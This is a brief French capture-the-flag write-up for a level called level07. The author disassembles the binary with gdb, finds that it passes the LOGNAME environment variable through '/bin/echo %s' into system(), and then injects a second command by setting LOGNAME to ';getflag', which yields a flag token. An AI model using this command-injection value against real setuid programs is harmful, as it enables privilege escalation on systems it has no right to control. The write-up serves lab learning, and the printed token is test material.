après analyse du fichier level07 avec gdb et ghidra j'arrive à la conclusion qu'il cherche LOGNAME
dans les env puis le print et enfin l'execute dans la fonction system mais en faisait un export
LOGNAME le print change bien pour getflag mais aucun flag ni message apparait...

>ls
level07

>gdb level07
    >disas main
        ...
        0x0804856f <+91>:	movl   $0x8048680,(%esp)
        0x08048576 <+98>:	call   0x8048400 <getenv@plt>
        0x0804857b <+103>:	mov    %eax,0x8(%esp)
        0x0804857f <+107>:	movl   $0x8048688,0x4(%esp)
        0x08048587 <+115>:	lea    0x14(%esp),%eax
        0x0804858b <+119>:	mov    %eax,(%esp)
        0x0804858e <+122>:	call   0x8048440 <asprintf@plt>
        0x08048593 <+127>:	mov    0x14(%esp),%eax
        0x08048597 <+131>:	mov    %eax,(%esp)
        0x0804859a <+134>:	call   0x8048410 <system@plt>
        ...

    Ici si on check chaque 0x, on peut voir que l'un donne ca :
    env = getenv("LOGNAME");
    asprintf(str, "/bin/echo %s", env);
    system(str);

> export LOGNAME=';getflag' (on ecrit le getflag comme ceci, car sinon il n'est pas execute)
Check flag.Here is your token : fiumuikeil55xe9cu4dood66h